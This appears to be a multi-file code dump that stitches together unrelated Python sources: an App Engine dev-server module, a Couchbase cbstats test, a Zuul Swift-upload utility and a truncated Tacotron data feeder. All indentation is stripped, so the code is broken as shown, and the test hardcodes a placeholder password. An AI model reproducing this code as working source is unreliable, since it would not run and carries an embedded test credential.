if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES or has_file_changes:
self.restart()
def _loop_watching_for_changes_and_idle_instances(self):
"""Loops until the InstancePool is done watching for file changes."""
while not self._quit_event.is_set():
if self.ready:
self._shutdown_idle_instances()
if self._automatic_restarts:
self._handle_changes()
self._quit_event.wait(timeout=1)
def _shutdown_idle_instances(self):
instances_to_stop = []
with self._condition:
for instance_id, inst in enumerate(self._instances):
if (self._instance_running[instance_id] and
inst.idle_seconds > self._instance_idle_timeout):
instances_to_stop.append((self._instances[instance_id],
self._wsgi_servers[instance_id]))
self._instance_running[instance_id] = False
new_instance = self._instance_factory.new_instance(
instance_id, expect_ready_request=True)
self._instances[instance_id] = new_instance
wsgi_servr = self._wsgi_servers[instance_id]
wsgi_servr.set_app(
functools.partial(self._handle_request, inst=new_instance))
self._port_registry.add(wsgi_servr.port, self, new_instance)
for inst, wsgi_servr in instances_to_stop:
logging.debug('Shutting down %r', inst)
self._stop_instance(inst, wsgi_servr)
def _stop_instance(self, inst, wsgi_servr):
inst.quit(expect_shutdown=True)
self._async_shutdown_instance(inst, wsgi_servr.port)
def restart(self):
"""Restarts the the module, replacing all running instances."""
instances_to_stop = []
instances_to_start = []
with self._condition:
if self._quit_event.is_set():
return
for instance_id, inst in enumerate(self._instances):
if self._instance_running[instance_id]:
instances_to_stop.append((inst, self._wsgi_servers[instance_id]))
new_instance = self._instance_factory.new_instance(
instance_id, expect_ready_request=True)
self._instances[instance_id] = new_instance
instances_to_start.append(instance_id)
wsgi_servr = self._wsgi_servers[instance_id]
wsgi_servr.set_app(
functools.partial(self._handle_request, inst=new_instance))
self._port_registry.add(wsgi_servr.port, self, new_instance)
for instance_id in instances_to_start:
self._async_start_instance(instance_id)
for inst, wsgi_servr in instances_to_stop:
self._stop_instance(inst, wsgi_servr)
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
try:
with self._condition:
return self._instances[int(instance_id)]
except (ValueError, IndexError):
raise request_info.InvalidInstanceIdError()
def __call__(self, environ, start_response, inst=None):
return self._handle_request(environ, start_response, inst)
@property
def supports_individually_addressable_instances(self):
return True
class InteractiveCommandModule(Module):
"""A Module that can evaluate user commands.
This module manages a single Instance which is started lazily.
"""
_MAX_REQUEST_WAIT_TIME = 15
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
use_mtime_file_watcher,
allow_skipped_files,
threadsafe_override):
"""Initializer for InteractiveCommandModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for this module.
host: A string containing the host that will be used when constructing
HTTP headers sent to the Instance executing the interactive command
e.g. "localhost".
balanced_port: An int specifying the port that will be used when
constructing HTTP headers sent to the Instance executing the
interactive command e.g. "localhost".
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instances containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(InteractiveCommandModule, self).__init__(
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances=1,
use_mtime_file_watcher=use_mtime_file_watcher,
automatic_restarts=True,
allow_skipped_files=allow_skipped_files,
threadsafe_override=threadsafe_override)
# Use a single instance so that state is consistent across requests.
self._inst_lock = threading.Lock()
self._inst = None
@property
def balanced_port(self):
"""The port that the balanced HTTP server for the Module is listening on.
The InteractiveCommandModule does not actually listen on this port but it is
used when constructing the "SERVER_PORT" in the WSGI-environment.
"""
return self._balanced_port
def quit(self):
"""Stops the InteractiveCommandModule."""
if self._inst:
self._inst.quit(force=True)
self._inst = None
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.INTERACTIVE_REQUEST):
"""Handles a interactive request by forwarding it to the managed Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants. This must be instance.INTERACTIVE_REQUEST.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
assert inst is None
assert request_type == instance.INTERACTIVE_REQUEST
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
while time.time() < timeout_time:
new_instance = False
with self._inst_lock:
if not self._inst:
self._inst = self._instance_factory.new_instance(
AutoScalingModule.generate_instance_id(),
expect_ready_request=False)
new_instance = True
inst = self._inst
if new_instance:
self._inst.start()
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
inst.wait(timeout_time)
except Exception:
# If the instance is restarted while handling a request then the
# exception raises is unpredictable.
if inst != self._inst:
start_response('503 Service Unavailable', [])
return ['Instance was restarted while executing command']
logging.exception('Unexpected exception handling command: %r', environ)
raise
else:
start_response('503 Service Unavailable', [])
return ['The command timed-out while waiting for another one to complete']
def restart(self):
"""Restarts the the module."""
with self._inst_lock:
if self._inst:
self._inst.quit(force=True)
self._inst = None
def send_interactive_command(self, command):
"""Sends an interactive command to the module.
Args:
command: The command to send e.g. "print 5+5".
Returns:
A string representing the result of the command e.g. "10\n".
Raises:
InteractiveCommandError: if the command failed for any reason.
"""
start_response = start_response_utils.CapturingStartResponse()
# 192.0.2.0 is an example address defined in RFC 5737.
environ = self.build_request_environ(
'POST', '/', [], command, '192.0.2.0', self.balanced_port)
try:
response = self._handle_request(
environ,
start_response,
request_type=instance.INTERACTIVE_REQUEST)
except Exception as e:
raise InteractiveCommandError('Unexpected command failure: ', str(e))
if start_response.status != '200 OK':
raise InteractiveCommandError(start_response.merged_response(response))
return start_response.merged_response(response)
|
cbStatsHashTest.py
|
from xdcrbasetests import XDCRReplicationBaseTest
from threading import Thread
from time import sleep
from remote.remote_util import RemoteMachineShellConnection
"""Testing timeouts to upsert due to cbstats hash traversal"""
class CbstatsHashTest(XDCRReplicationBaseTest):
def setUp(self):
super(CbstatsHashTest, self).setUp()
def tearDown(self):
super(CbstatsHashTest, self).tearDown()
def setup_extended(self):
pass
def __setup_replication_clusters(self, src_master, dest_master, src_cluster_name, dest_cluster_name):
self._link_clusters(src_master, dest_cluster_name, dest_master)
self._link_clusters(dest_master, src_cluster_name, src_master)
def test_verify_mb30553(self):
# Setup unidirectional replication
src_cluster_name, dest_cluster_name = "remote-dest-src", "remote-src-dest"
self.__setup_replication_clusters(self.src_master, self.dest_master, src_cluster_name, dest_cluster_name)
self._replicate_clusters(self.src_master, dest_cluster_name)
# Run upsert thread
thread = Thread(target=self.run_upsert)
thread.start()
# Ramp up phase
sleep(10)
node = self.src_master.get_master_node()
conn = RemoteMachineShellConnection()
command = "/opt/couchbase/bin/cbstats -u cbadminbucket -p password " + node.ip + ":11210 -b default hash"
output, error = conn.execute_command(command)
conn.log_command_output(output, error)
thread.join()
def run_upsert(self):
buckets = self._get_cluster_buckets(self.src_master)
for bucket in buckets:
if bucket.name == 'default':
for keySuffix in range(1, 1000000):
bucket.upsert('key' + keySuffix, 'Value ' + keySuffix, replicate_to=1)
|
zuul_swift_upload.py
|
#!/usr/bin/env python3
#
# Copyright 2014 Rackspace Australia
# Copyright 2018 Red Hat, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
"""
Utility to upload files to swift
"""
import argparse
import logging
import mimetypes
import os
try:
import queue as queuelib
except ImportError:
import Queue as queuelib
import shutil
import stat
import sys
import tempfile
import threading
import time
import zlib
import collections
import openstack
import requests
import requests.exceptions
import requestsexceptions
from ansible.module_utils.basic import AnsibleModule
try:
# Python 3.3+
from collections.abc import Sequence
except ImportError:
from collections import Sequence
mimetypes.init()
mimetypes.add_type('text/plain', '.yaml')
MAX_UPLOAD_THREADS = 24
POST_ATTEMPTS = 3
# Map mime types to apache icons
APACHE_MIME_ICON_MAP = {
'_default': 'unknown.png',
'application/gzip': 'compressed.png',
'application/directory': 'folder.png',
'text/html': 'text.png',
'text/plain': 'text.png',
}
# Map mime types to apache icons
APACHE_FILE_ICON_MAP = {
'..': 'back.png',
}
# These icon files are from the Apache project and are in the public
# domain.
ICON_IMAGES = {
'back.png': 'iVBORw0KGgoAAAANSUhEUgAAABQAAAAWCAMAAAD3n0w0AAAAElBMVEX/'
'///M//+ZmZlmZmYzMzMAAACei5rnAAAAAnRSTlP/AOW3MEoAAABWSURB'
'VHjabdBBCgAhDEPRRpv7X3kwEMsQ//IRRC08urjRHbha5VLFUsVSxVI9'
'lmDh5hMpHD6n0EgoiZG0DNINpnWlcVXaRix76e1/8dddcL6nG0Ri9gHj'
'tgSXKYeLBgAAAABJRU5ErkJggg==',
'compressed.png': 'iVBORw0KGgoAAAANSUhEUgAAABQAAAAWCAMAAAD3n0w0AAADAFBM'
'VEX//////8z//5n//2b//zP//wD/zP//zMz/zJn/zGb/zDP/zAD/'
'mf//mcz/mZn/mWb/mTP/mQD/Zv//Zsz/Zpn/Zmb/ZjP/ZgD/M///'
'M8z/M5n/M2b/MzP/MwD/AP//AMz/AJn/AGb/ADP/AADM///M/8zM'
'/5nM/2bM/zPM/wDMzP/MzMzMzJnMzGbMzDPMzADMmf/MmczMmZnM'
'mWbMmTPMmQDMZv/MZszMZpnMZmbMZjPMZgDMM//MM8zMM5nMM2bM'
'MzPMMwDMAP/MAMzMAJnMAGbMADPMAACZ//+Z/8yZ/5mZ/2aZ/zOZ'
'/wCZzP+ZzMyZzJmZzGaZzDOZzACZmf+ZmcyZmZmZmWaZmTOZmQCZ'
'Zv+ZZsyZZpmZZmaZZjOZZgCZM/+ZM8yZM5mZM2aZMzOZMwCZAP+Z'
'AMyZAJmZAGaZADOZAABm//9m/8xm/5lm/2Zm/zNm/wBmzP9mzMxm'
'zJlmzGZmzDNmzABmmf9mmcxmmZlmmWZmmTNmmQBmZv9mZsxmZplm'
'ZmZmZjNmZgBmM/9mM8xmM5lmM2ZmMzNmMwBmAP9mAMxmAJlmAGZm'
'ADNmAAAz//8z/8wz/5kz/2Yz/zMz/wAzzP8zzMwzzJkzzGYzzDMz'
'zAAzmf8zmcwzmZkzmWYzmTMzmQAzZv8zZswzZpkzZmYzZjMzZgAz'
'M/8zM8wzM5kzM2YzMzMzMwAzAP8zAMwzAJkzAGYzADMzAAAA//8A'
'/8wA/5kA/2YA/zMA/wAAzP8AzMwAzJkAzGYAzDMAzAAAmf8AmcwA'
'mZkAmWYAmTMAmQAAZv8AZswAZpkAZmYAZjMAZgAAM/8AM8wAM5kA'
'M2YAMzMAMwAAAP8AAMwAAJkAAGYAADPuAADdAAC7AACqAACIAAB3'
'AABVAABEAAAiAAARAAAA7gAA3QAAuwAAqgAAiAAAdwAAVQAARAAA'
'IgAAEQAAAO4AAN0AALsAAKoAAIgAAHcAAFUAAEQAACIAABHu7u7d'
'3d27u7uqqqqIiIh3d3dVVVVEREQiIiIREREAAAD7CIKZAAAAJXRS'
'TlP///////////////////////////////////////////////8A'
'P89CTwAAAGtJREFUeNp9z9ENgDAIhOEOco+dybVuEXasFMRDY/x5'
'+xJCO6Znu6kSx7BhXyjtKBWWNlwW88Loid7hFRKBXiIYCMfMEYUQ'
'QohC3CjFA5nIjqx1CqlDLGR/EhM5O06yvin0ftGOyIS7lV14AsQN'
'aR7rMEBYAAAAAElFTkSuQmCC',
'folder.png': 'iVBORw0KGgoAAAANSUhEUgAAABQAAAAWCAMAAAD3n0w0AAAAElBMVEX/'
'////zJnM//+ZZjMzMzMAAADCEvqoAAAAA3RSTlP//wDXyg1BAAAASElE'
'QVR42s3KQQ6AQAhDUaXt/a/sQDrRJu7c+NmQB0e99B3lnqjT6cYx6zSI'
'bV40n3D7psYMoBoz4w8/EdNYQsbGEjNxYSljXTEsA9O1pLTvAAAAAElF'
'TkSuQmCC',
'text.png': 'iVBORw0KGgoAAAANSUhEUgAAABQAAAAWCAMAAAD3n0w0AAAAD1BMVEX/'
'///M//+ZmZkzMzMAAABVsTOVAAAAAnRSTlP/AOW3MEoAAABISURBVHja'
'tcrRCgAgCENRbf7/N7dKomGvngjhMsPLD4NdMPwia438NRIyxsaL/XQZ'
'hyxpkC6zyjLXGVXnkhqWJWIIrOgeinECLlUCjBCqNQoAAAAASUVORK5C'
'YII=',
'unknown.png': 'iVBORw0KGgoAAAANSUhEUgAAABQAAAAWCAMAAAD3n0w0AAAAD1BMVEX/'
'///M//+ZmZkzMzMAAABVsTOVAAAAAnRSTlP/AOW3MEoAAABYSURBVHja'
'ncvRDoAgDEPRruX/v1kmNHPBxMTLyzgD6FmsILg56g2hQnJkOco4yZhq'
'tN5nYd5Zq0LsHblwxwP9GTCWsaGtoelANKzOlz/RfaLYUmLE6E28ALlN'
'AupSdoFsAAAAAElFTkSuQmCC'}
def get_mime_icon(mime, filename=''):
icon = (APACHE_FILE_ICON_MAP.get(filename) or
APACHE_MIME_ICON_MAP.get(mime) or
APACHE_MIME_ICON_MAP['_default'])
return "data:image/png;base64,%s" % ICON_IMAGES[icon]
def sizeof_fmt(num, suffix='B'):
# From http://stackoverflow.com/questions/1094841/
# reusable-library-to-get-human-readable-version-of-file-size
for unit in ['', 'K', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1024.0:
return "%3.1f%s%s" % (num, unit, suffix)
num /= 1024.0
return "%.1f%s%s" % (num, 'Y', suffix)
class FileDetail():
"""
Used to generate indexes with links or as the file path
to push to swift.
"""
def __init__(self, full_path, relative_path, filename=None):
"""
Args:
full_path (str): The absolute path to the file on disk.
relative_path (str): The relative path from the artifacts source
used for links.
filename (str): An optional alternate filename in links.
"""
self.full_path = full_path
if filename is None:
self.filename = os.path.basename(full_path)
else:
self.filename = filename
self.relative_path = relative_path
if self.full_path and os.path.isfile(self.full_path):
mime_guess, encoding = mimetypes.guess_type(self.full_path)
self.mimetype = mime_guess if mime_guess else 'text/plain'
self.encoding = encoding
self.folder = False
else:
self.mimetype = 'application/directory'
self.encoding = None
self.folder = True
if self.full_path:
st = os.stat(self.full_path)
self.last_modified = time.gmtime(st[stat.ST_MTIME])
self.size = st[stat.ST_SIZE]
else:
self.last_modified = time.gmtime(0)
self.size = 0
def __repr__(self):
t = 'Folder' if self.folder else 'File'
return '<%s %s>' % (t, self.relative_path)
class FileList(Sequence):
'''A collection of FileDetail objects
This is a list-like group of FileDetail objects, intended to be
used as a context manager around the upload process.
'''
def __init__(self):
self.file_list = []
self.file_list.append(FileDetail(None, '', ''))
self.tempdirs = []
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
for tempdir in self.tempdirs:
shutil.rmtree(tempdir)
def __getitem__(self, item):
return self.file_list.__getitem__(item)
def __len__(self):
return self.file_list.__len__()
def get_tempdir(self):
'''Get a temporary directory
Returns path to a private temporary directory which will be
cleaned on exit
'''
tempdir = tempfile.mkdtemp(prefix='s-u-l-tmp')
self.tempdirs.append(tempdir)
return tempdir
@staticmethod
def _path_in_tree(root, path):
full_path = os.path.realpath(os.path.abspath(
os.path.expanduser(path)))
if not full_path.startswith(root):
logging.debug("Skipping path outside root: %s" % (path,))
return False
return True
def add(self, file_path):
"""
Generate a list of files to upload to swift. Recurses through
directories
"""
# file_list: A list of FileDetails to push to swift
file_list = []
if os.path.isfile(file_path):
relative_path = os.path.basename(file_path)
file_list.append(FileDetail(file_path, relative_path))
elif os.path.isdir(file_path):
original_root = os.path.realpath(os.path.abspath(
os.path.expanduser(file_path)))
parent_dir = os.path.dirname(file_path)
if not file_path.endswith('/'):
filename = os.path.basename(file_path)
full_path = file_path
relative_name = os.path.relpath(full_path, parent_dir)
file_list.append(FileDetail(full_path, relative_name,
filename))
# TODO: this will copy the result of symlinked files, but
# it won't follow directory symlinks. If we add that, we
# should ensure that we don't loop.
for path, folders, files in os.walk(file_path):
# Sort folder in-place so that we recurse in order.
files.sort(key=lambda x: x.lower())
folders.sort(key=lambda x: x.lower())
# relative_path: The path between the given directory
# and the one being currently walked.
relative_path = os.path.relpath(path, parent_dir)
for filename in folders:
full_path = os.path.join(path, filename)
if not self._path_in_tree(original_root, full_path):
continue
relative_name = os.path.relpath(full_path, parent_dir)
file_list.append(FileDetail(full_path, relative_name,
filename))
for filename in files:
full_path = os.path.join(path, filename)
if not self._path_in_tree(original_root, full_path):
continue
relative_name = os.path.relpath(full_path, parent_dir)
file_detail = FileDetail(full_path, relative_name)
file_list.append(file_detail)
self.file_list += file_list
class Indexer():
"""Index a FileList
Functions to generate indexes and other collated data for a
FileList
- make_indexes() : make index.html in folders
"""
def __init__(self, file_list):
'''
Args:
file_list (FileList): A FileList object with all files
to be indexed.
'''
assert isinstance(file_list, FileList)
self.file_list = file_list
def _make_index_file(self, folder_links, title, tempdir, append_footer):
"""Writes an index into a file for pushing"""
for file_details in folder_links:
# Do not generate an index file if one exists already.
# This may be the case when uploading other machine generated
# content like python coverage info.
if self.index_filename == file_details.filename:
return
index_content = self._generate_log_index(
folder_links, title, append_footer)
fd = open(os.path.join(tempdir, self.index_filename), 'w')
fd.write(index_content)
return os.path.join(tempdir, self.index_filename)
def _generate_log_index(self, folder_links, title, append_footer):
"""Create an index of logfiles and links to them"""
output = '<html><head><title>%s</title></head><body>\n' % title
output += '<h1>%s</h1>\n' % title
output += '<table><tr><th></th><th>Name</th><th>Last Modified</th>'
output += '<th>Size</th></tr>'
file_details_to_append = None
for file_details in folder_links:
output += '<tr>'
output += (
'<td><img alt="[ ]" title="%(m)s" src="%(i)s"></img></td>' % ({
'm': file_details.mimetype,
'i': get_mime_icon(file_details.mimetype,
file_details.filename),
}))
filename = file_details.filename
if file_details.folder:
filename += '/'
output += '<td><a href="%s">%s</a></td>' % (filename,
filename)
output += '<td>%s</td>' % time.asctime(
file_details.last_modified)
size = sizeof_fmt(file_details.size, suffix='')
output += '<td style="text-align: right">%s</td>' % size
output += '</tr>\n'
if (append_footer and
append_footer in file_details.filename):
file_details_to_append = file_details
output += '</table>'
if file_details_to_append:
output += '<br /><hr />'
try:
with open(file_details_to_append.full_path, 'r') as f:
output += f.read()
except IOError:
logging.exception("Error opening file for appending")
output += '</body></html>\n'
return output
def make_indexes(self, create_parent_links=True,
create_topdir_parent_link=False,
append_footer='index_footer.html'):
'''Make index.html files
Iterate the file list and crete index.html files for folders
Args:
create_parent_links (bool): Create parent links
create_topdir_parent_link (bool): Create topdir parent link
append_footer (str): Filename of a footer to append to each
generated page
Return:
No value, the self.file_list will be updated
'''
self.index_filename = 'index.html'
folders = collections.OrderedDict()
for f in self.file_list:
if f.folder:
folders[f.relative_path] = []
folder = os.path.dirname(os.path.dirname(
f.relative_path + '/'))
if folder == '/':
folder = ''
else:
folder = os.path.dirname(f.relative_path)
folders[folder].append(f)
indexes = {}
parent_file_detail = FileDetail(None, '..', '..')
for folder, files in folders.items():
# Don't add the pseudo-top-directory
if files and files[0].full_path is None:
files = files[1:]
if create_topdir_parent_link:
files = [parent_file_detail] + files
elif create_parent_links:
files = [parent_file_detail] + files
# Do generate a link to the parent directory
full_path = self._make_index_file(files, 'Index of %s' % (folder,),
self.file_list.get_tempdir(),
append_footer)
if full_path:
filename = os.path.basename(full_path)
relative_name = os.path.join(folder, filename)
indexes[folder] = FileDetail(full_path, relative_name)
# This appends the index file at the end of the group of files
# for each directory.
new_list = []
last_dirname = None
for f in reversed(list(self.file_list)):
if f.folder:
relative_path = f.relative_path + '/'
else:
relative_path = f.relative_path
dirname = os.path.dirname(relative_path)
if dirname == '/':
dirname = ''
if dirname != last_dirname:
index = indexes.pop(dirname, None)
if index:
new_list.append(index)
last_dirname = dirname
new_list.append(f)
new_list.reverse()
self.file_list.file_list = new_list
class DeflateFilter():
chunk_size = 16384
def __init__(self, infile):
self.infile = infile
self.encoder = zlib.compressobj()
self.done = False
def __iter__(self):
return self
def __next__(self):
if self.done:
raise StopIteration()
ret = b''
while True:
data = self.infile.read(self.chunk_size)
if data:
ret = self.encoder.compress(data)
if ret:
break
else:
self.done = True
ret = self.encoder.flush()
break
return ret
class Uploader():
def __init__(self, cloud, container, prefix=None, delete_after=None,
public=True):
if isinstance(cloud, dict):
config = openstack.config.loader.OpenStackConfig().get_one(**cloud)
self.cloud = openstack.connection.Connection(config=config)
else:
self.cloud = openstack.connect(cloud=cloud)
self.container = container
self.prefix = prefix or ''
self.delete_after = delete_after
sess = self.cloud.config.get_session()
adapter = requests.adapters.HTTPAdapter(pool_maxsize=100)
sess.mount('https://', adapter)
if not self.cloud.get_container(self.container):
self.cloud.create_container(name=self.container, public=public)
self.cloud.update_container(
name=self.container,
headers={'X-Container-Meta-Web-Index': 'index.html'})
# 'X-Container-Meta-Web-Listings': 'true'
# The ceph radosgw swift implementation requires an
# index.html at the root in order for any other indexes to
# work.
self.cloud.create_object(self.container,
name='index.html',
data='',
content_type='text/html')
self.url = os.path.join(self.cloud.object_store.get_endpoint(),
self.container, self.prefix)
def upload(self, file_list):
"""Spin up thread pool to upload to swift"""
num_threads = min(len(file_list), MAX_UPLOAD_THREADS)
threads = []
queue = queuelib.Queue()
# add items to queue
for f in file_list:
queue.put(f)
for x in range(num_threads):
t = threading.Thread(target=self.post_thread, args=(queue,))
threads.append(t)
t.start()
for t in threads:
t.join()
def post_thread(self, queue):
while True:
try:
file_detail = queue.get_nowait()
logging.debug("%s: processing job %s",
threading.current_thread(),
file_detail)
self._post_file(file_detail)
except requests.exceptions.RequestException:
# Do our best to attempt to upload all the files
logging.exception("Error posting file after multiple attempts")
continue
except IOError:
# Do our best to attempt to upload all the files
logging.exception("Error opening file")
continue
except queuelib.Empty:
# No more work to do
return
@staticmethod
def _is_text_type(mimetype):
# We want to compress all text types.
if mimetype.startswith('text/'):
return True
# Further compress types that typically contain text but are no
# text sub type.
compress_types = [
'application/json',
'image/svg+xml',
]
if mimetype in compress_types:
return True
return False
def _post_file(self, file_detail):
relative_path = os.path.join(self.prefix, file_detail.relative_path)
headers = {}
if self.delete_after:
headers['x-delete-after'] = str(self.delete_after)
headers['content-type'] = file_detail.mimetype
for attempt in range(1, POST_ATTEMPTS + 1):
try:
if not file_detail.folder:
if (file_detail.encoding is None and
self._is_text_type(file_detail.mimetype)):
headers['content-encoding'] = 'deflate'
data = DeflateFilter(open(file_detail.full_path, 'rb'))
else:
if file_detail.encoding:
headers['content-encoding'] = file_detail.encoding
data = open(file_detail.full_path, 'rb')
else:
data = ''
relative_path = relative_path.rstrip('/')
if relative_path == '':
relative_path = '/'
self.cloud.create_object(self.container,
name=relative_path,
data=data,
**headers)
break
except requests.exceptions.RequestException:
logging.exception(
"File posting error on attempt %d" % attempt)
if attempt >= POST_ATTEMPTS:
raise
def run(cloud, container, files,
indexes=True, parent_links=True, topdir_parent_link=False,
partition=False, footer='index_footer.html', delete_after=15552000,
prefix=None, public=True, dry_run=False):
if prefix:
prefix = prefix.lstrip('/')
if partition and prefix:
parts = prefix.split('/')
if len(parts) > 1:
container += '_' + parts[0]
prefix = '/'.join(parts[1:])
# Create the objects to make sure the arguments are sound.
with FileList() as file_list:
# Scan the files.
for file_path in files:
file_list.add(file_path)
indexer = Indexer(file_list)
# (Possibly) make indexes.
if indexes:
indexer.make_indexes(create_parent_links=parent_links,
create_topdir_parent_link=topdir_parent_link,
append_footer=footer)
logging.debug("List of files prepared to upload:")
for x in file_list:
logging.debug(x)
# Do no connect to swift or do any uploading in a dry run
if dry_run:
# No URL is known, so return nothing
return
# Upload.
uploader = Uploader(cloud, container, prefix, delete_after,
public)
uploader.upload(file_list)
return uploader.url
def ansible_main():
module = AnsibleModule(
argument_spec=dict(
cloud=dict(required=True, type='raw'),
container=dict(required=True, type='str'),
files=dict(required=True, type='list'),
partition=dict(type='bool', default=False),
indexes=dict(type='bool', default=True),
parent_links=dict(type='bool', default=True),
topdir_parent_link=dict(type='bool', default=False),
public=dict(type='bool', default=True),
footer=dict(type='str'),
delete_after=dict(type='int'),
prefix=dict(type='str'),
)
)
p = module.params
url = run(p.get('cloud'), p.get('container'), p.get('files'),
indexes=p.get('indexes'),
parent_links=p.get('parent_links'),
topdir_parent_link=p.get('topdir_parent_link'),
partition=p.get('partition'),
footer=p.get('footer'),
delete_after=p.get('delete_after', 15552000),
prefix=p.get('prefix'),
public=p.get('public'))
module.exit_json(changed=True,
url=url)
def cli_main():
parser = argparse.ArgumentParser(
description="Upload files to swift"
)
parser.add_argument('--verbose', action='store_true',
help='show debug information')
parser.add_argument('--no-indexes', action='store_true',
help='do not generate any indexes at all')
parser.add_argument('--no-parent-links', action='store_true',
help='do not include links back to a parent dir')
parser.add_argument('--create-topdir-parent-link', action='store_true',
help='include a link in the root directory of the '
'files to the parent directory which may be the '
'index of all results')
parser.add_argument('--no-public', action='store_true',
help='do not create the container as public')
parser.add_argument('--partition', action='store_true',
help='partition the prefix into multiple containers')
parser.add_argument('--append-footer', default='index_footer.html',
help='when generating an index, if the given file is '
'present in a directory, append it to the index '
'(set to "none" to disable)')
parser.add_argument('--delete-after', default=15552000,
help='Number of seconds to delete object after '
'upload. Default is 6 months (15552000 seconds) '
'and if set to 0 X-Delete-After will not be set',
type=int)
parser.add_argument('--prefix',
help='Prepend this path to the object names when '
'uploading')
parser.add_argument('--dry-run', action='store_true',
help='do not attempt to create containers or upload, '
'useful with --verbose for debugging')
parser.add_argument('cloud',
help='Name of the cloud to use when uploading')
parser.add_argument('container',
help='Name of the container to use when uploading')
parser.add_argument('files', nargs='+',
help='the file(s) to upload with recursive glob '
'matching when supplied as a string')
args = parser.parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
# Set requests log level accordingly
logging.getLogger("requests").setLevel(logging.DEBUG)
logging.captureWarnings(True)
append_footer = args.append_footer
if append_footer.lower() == 'none':
append_footer = None
url = run(args.cloud, args.container, args.files,
indexes=not args.no_indexes,
parent_links=not args.no_parent_links,
topdir_parent_link=args.create_topdir_parent_link,
partition=args.partition,
footer=append_footer,
delete_after=args.delete_after,
prefix=args.prefix,
public=not args.no_public,
dry_run=args.dry_run)
print(url)
if __name__ == '__main__':
# Avoid unactionable warnings
requestsexceptions.squelch_warnings(
requestsexceptions.InsecureRequestWarning)
if sys.stdin.isatty():
cli_main()
else:
ansible_main()
|
feeder.py
|
from sklearn.model_selection import train_test_split
from synthesizer.utils.text import text_to_sequence
from synthesizer.infolog import log
import tensorflow as tf
import numpy as np
import threading
import time
import os
_batches_per_group = 64
class Feeder:
"""
Feeds batches of data into queue on a background thread.
"""
def __init__(self, coordinator, metadata_filename, hparams):
super(Feeder, self).__init__()
self._coord = coordinator
self._hparams = hparams
self._cleaner_names = [x.strip() for x in hparams.cleaners.split(",")]
self._train_offset = 0
self._test_offset = 0
# Load metadata
self._mel_dir = os.path.join(os.path.dirname(metadata_filename), "mels")
self._embed_dir = os.path.join(os.path.dirname(metadata_filename), "embeds")
with open(metadata_filename, encoding="utf-8") as f:
self._metadata = [line.strip().split("|") for line in f]
frame_shift_ms = hparams.hop_size / hparams.sample_rate
hours = sum([int(x[4]) for x in self._metadata]) * frame_shift_ms / (3600)
log("Loaded metadata for {} examples ({:.2f} hours)".format(len(self._metadata), hours))
#Train test split
if hparams.tacotron_test_size is None:
assert hparams.tacotron_test_batches is not None
test_size = (hparams.tacotron_test_size if hparams.tacotron_test_size is not None
else hparams.tacotron_test_batches * hparams.tacotron_batch_size)
indices = np.arange(len(self._metadata))
train_indices, test_indices = train_test_split(indices,
test_size=test_size, random_state=hparams.tacotron_data_random_state)
#Make sure test_indices is a multiple of batch_size else round up
len_test_indices = self._round_down(len(test_indices), hparams.tacotron_batch_size)
extra_test = test_indices[len_test_indices:]
test_indices = test_indices[:len_test_indices]
train_indices = np.concatenate([train_indices, extra_test])
self._train_meta = list(np.array(self._metadata)[train_indices])
self._test_meta = list(np.array(self._metadata)[test_indices])
self.test_steps = len(self._test_meta) // hparams.tacotron_batch_size
if hparams.tacotron_test_size is None:
assert hparams.tacotron_test_batches == self.test_steps
#pad input sequences with the <pad_token> 0 ( _ )
self._pad = 0
#explicitely setting the padding to a value that doesn"t originally exist in the spectogram
#to avoid any possible conflicts, without affecting the output range of the model too much
if hparams.symmetric_mels:
